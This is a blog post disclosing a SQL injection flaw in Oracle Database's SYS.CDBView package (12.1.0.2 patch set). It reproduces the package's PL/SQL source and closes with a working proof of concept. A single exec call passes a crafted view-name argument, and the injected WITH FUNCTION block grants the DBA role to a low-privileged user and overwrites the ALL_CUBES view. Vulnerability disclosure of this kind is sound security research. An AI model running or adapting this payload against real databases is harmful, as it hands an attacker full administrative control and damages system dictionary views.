SQL Injection vulnerability : CDBView Package

Here is a vulnerability i recently discovered inside the CDBView package (Create the cdb view) on my Database Patch Set Update : 12.1.0.2.161018 (24006101) .The package is granted to the “EXECUTE_CATALOG_ROLE” Role by default.

The package is not even wrapped, but this is not a problem as we can easily unwrap it anyway :


CREATE OR REPLACE package body SYS.CDBView is
-- Create the cdb view
-- private helper procedure to create the cdb view
-- Note that quotes should not be added around owner, oldview_name and
-- newview_name before create_cdbview is invoked since all three are used
-- as literals to query dictionary views.
procedure create_cdbview(chk_upgrd IN boolean, owner IN varchar2,
oldview_name IN varchar2, newview_name IN varchar2) as
sqlstmt        varchar2(4000);
col_name       varchar2(128);
comments       varchar2(4000);
col_type       number;
upper_owner    varchar2(128);
upper_oldview  varchar2(128);
quoted_owner   varchar2(130); -- 2 more than size of owner
quoted_oldview varchar2(130); -- 2 more than size of oldview_name
quoted_newview varchar2(130); -- 2 more than size of newview_name

cursor tblcommentscur is select c.comment$
from sys.obj$ o, sys.user$ u, sys.com$ c
where o.name = upper_oldview and u.name = upper_owner
and o.obj# = c.obj# and o.owner#=u.user# and o.type# = 4
and c.col# is null;

cursor colcommentscur is select c.name, co.comment$, c.type#
from sys.obj$ o, sys.col$ c, sys.user$ u, sys.com$ co
where o.name = upper_oldview and u.name = upper_owner
and o.owner# = u.user# and o.type# = 4 and o.obj# = c.obj#
and c.obj# = co.obj# and c.intcol# = co.col#
and bitand(c.property, 32) = 0;

begin

-- convert owner and view names to upper case
upper_owner    := upper(owner);
upper_oldview  := upper(oldview_name);

quoted_owner   := '"' || upper_owner         || '"';
quoted_oldview := '"' || upper_oldview       || '"';
quoted_newview := '"' || upper(newview_name) || '"';

-- Create cdb view
sqlstmt := 'CREATE OR REPLACE VIEW ' ||
quoted_owner || '.' || quoted_newview ||
' CONTAINER_DATA AS SELECT * FROM CONTAINERS(' ||
quoted_owner || '.' || quoted_oldview || ')';

--dbms_output.put_line(sqlstmt);
execute immediate sqlstmt;

-- table and column comments
open tblcommentscur;
fetch tblcommentscur into comments;
comments := replace(comments, '''','''''');
sqlstmt := 'comment on table ' || quoted_owner || '.' || quoted_newview ||
' is ''' || comments || ' in all containers''';
-- dbms_output.put_line(sqlstmt);
execute immediate sqlstmt;
close tblcommentscur;

sqlstmt := 'comment on column ' || quoted_owner || '.' || quoted_newview ||
'.CON_ID is ''container id''';
-- dbms_output.put_line(sqlstmt);
execute immediate sqlstmt;
open colcommentscur;
loop
fetch colcommentscur into col_name, comments, col_type;
exit when colcommentscur%NOTFOUND;

comments := replace(comments, '''','''''');
if comments is not NULL and
col_type <> 8        and
col_type <> 123      then
sqlstmt := 'comment on column ' ||
quoted_owner || '.' || quoted_newview || '.' ||
col_name || ' is ''' || comments || '''';
-- dbms_output.put_line(sqlstmt);
execute immediate sqlstmt;
end if;
end loop;
close colcommentscur;
end;

end CDBView;

We can clearly see that there is no complex check to the input parameters ! So any person having access to this package can exploit it !

Privilege escalation  DEMO :

Here i gonna connect to the database using the user HATEM which have only “EXECUTE_CATALOG_ROLE” role granted and stole the DBA Role.

WARNING :  In this Example the view ALL_CUBES will be replaced.


exec sys.CDBView.create_cdbview(true,'ALL_CUBES" as select /*+WITH_PLSQL*/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN /* ','old_view' ,' */ execute immediate ''grant dba to hatem''; RETURN ''1'';END; SELECT f as x FROM dual)-- ');
select  /*+WITH_PLSQL*/ * from ALL_CUBES;

capture

We now have the DBA role in our hand !

That’s it 😀

5 thoughts on “SQL Injection vulnerability : CDBView Package

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s